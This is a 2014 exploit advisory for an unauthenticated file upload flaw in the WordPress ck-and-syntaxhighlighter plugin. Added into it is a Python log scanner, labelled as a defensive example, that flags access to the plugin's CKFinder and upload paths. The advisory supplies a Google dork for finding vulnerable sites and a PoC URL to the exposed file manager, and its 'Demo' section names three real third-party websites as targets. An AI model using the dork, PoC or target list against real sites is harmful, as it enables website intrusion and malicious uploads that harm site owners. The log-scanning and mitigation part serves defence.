[+] Title: WordPress ck-and-syntaxhighlighter Plugin RFU vulnerability
[+] Date: 2014-08-16
[+] Author: Hekt0r
[+] Tested on: Windows 7 & Kali Linux
[+] Vendor Homepage: http://wordpress.org/
[+] Software Link: http://wordpress.org/plugins/ck-and-syntaxhighlighter/
[+] Dork : inurl:/wp-content/plugins/ck-and-syntaxhighlighter/
### POC:
http://localhost/wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
[+] File Uploaded:
http://localhost/wordpress/wp-content/uploads/ckfinder/files/file.txt
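For site owners, the two paths in the PoC above (the plugin's bundled ckfinder/ directory and the wp-content/uploads/ckfinder/files/ upload folder) can be looked for in web server access logs. The script below is an added example, not part of the original advisory; it assumes Combined Log Format, its sample log lines are constructed, and the list of script extensions is an assumption to adjust per server.

```python
import re
from urllib.parse import unquote

# Paths taken from the advisory's PoC URLs.
CKFINDER_DIR = "/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/"
UPLOAD_DIR = "/wp-content/uploads/ckfinder/files/"
# Assumption: extensions this server would execute; adjust per deployment.
SCRIPT_EXTS = {"php", "phtml", "php5", "phar"}

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Aug/2014:10:01:02 +0000] "GET /wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html HTTP/1.1" 200 1432',
    '203.0.113.7 - - [16/Aug/2014:10:02:10 +0000] "GET /wordpress/wp-content/uploads/ckfinder/files/file.txt HTTP/1.1" 200 12',
    '203.0.113.7 - - [16/Aug/2014:10:03:30 +0000] "GET /wordpress/wp-content/uploads/ckfinder/files/a.php HTTP/1.1" 200 0',
    '198.51.100.4 - - [16/Aug/2014:10:05:00 +0000] "GET /wordpress/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html HTTP/1.1" 403 199',
    '198.51.100.9 - - [16/Aug/2014:10:06:00 +0000] "GET /wordpress/index.php HTTP/1.1" 200 5120',
]

def classify(path):
    """Return a finding label for a request path, or None if unrelated."""
    p = unquote(path.split("?", 1)[0]).lower()
    if UPLOAD_DIR in p:
        name = p.rsplit("/", 1)[-1]
        exts = set(name.split(".")[1:])  # every extension segment, e.g. x.php.jpg
        return "uploaded-script-fetched" if exts & SCRIPT_EXTS else "uploaded-file-fetched"
    if CKFINDER_DIR in p:
        return "ckfinder-accessed"
    return None

def scan(lines):
    """Group requests that reached the CKFinder or upload paths by client IP."""
    findings = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status = m.groups()
        label = classify(path)
        if label and int(status) < 400:  # skip requests the server refused
            findings.setdefault(ip, []).append((ts, method, status, label))
    return findings

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        for hit in hits:
            print(ip, *hit)
```

Any "ckfinder-accessed" hit with a 2xx status means the file manager is reachable without going through WordPress; removing the plugin or denying access to its ckfinder/ directory at the web server closes that path.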
### Demo:
http://www.tourgueniev.fr/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://www.neihuecc.org/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
http://blog.itacm.cn/wp-content/plugins/ck-and-syntaxhighlighter/ckfinder/ckfinder.html
### Credits:
[+] Special Thanks: ICL [+] iransec.net